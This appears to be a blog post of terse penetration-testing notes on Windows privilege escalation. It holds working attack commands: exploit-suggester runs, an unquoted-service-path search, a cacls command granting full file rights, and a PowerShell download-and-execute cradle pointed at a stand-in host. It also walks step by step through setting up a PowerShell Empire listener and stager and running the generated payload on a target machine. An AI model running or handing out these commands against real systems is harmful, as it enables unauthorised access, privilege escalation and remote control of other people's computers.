Windows Privesc

windows-exploit-suggester.py --update
 windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt 
 windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --ostext 'windows server 2008 r2' 
 unquoted service paths
 wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\" |findstr /i /v """
 cacls  /t /e /p UserName:F   <---Give a user readership of a file through an ACL
 Use powershell/management/runas in Empire or post/windows/manage/run_as in Metasploit if you have creds, in order to pop a new shell.
 powershell IEX (New-Object Net.WebClient).DownloadString('http://badshit.com')
 Powershell Empire
 
 Quick and dirty
 ./empire
 uselistener http
 set Host 
 execute
 usestager multi/launcher
 set Listener http
 generate
 Edit the install.sh and change all pip install commands to pip2 install
 run ./install.sh 
 set up should complete
 
 Set up Listener
 type in "listener" to the main menu
 type in "uselistener " 
 Type in "execute" in order to start the listener
 
 Set up stager
 from anywhere type "usestager windows/launcher_bat"
 from stager prompt, type "set Listener "
 Now type "generate" this will make your payload and place it in the tmp directory
 
 Now take the malicious file or command and run it on the windows machine
 Type in "listeners" to see active listener
 Type in "interact "
 once interacted with the listener type "rename "
 interact  **interacts with active session
 once inside of agent you can do the following
 usemodule 
 

2. Pour Widows

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l’aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l’aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l’aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l’aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s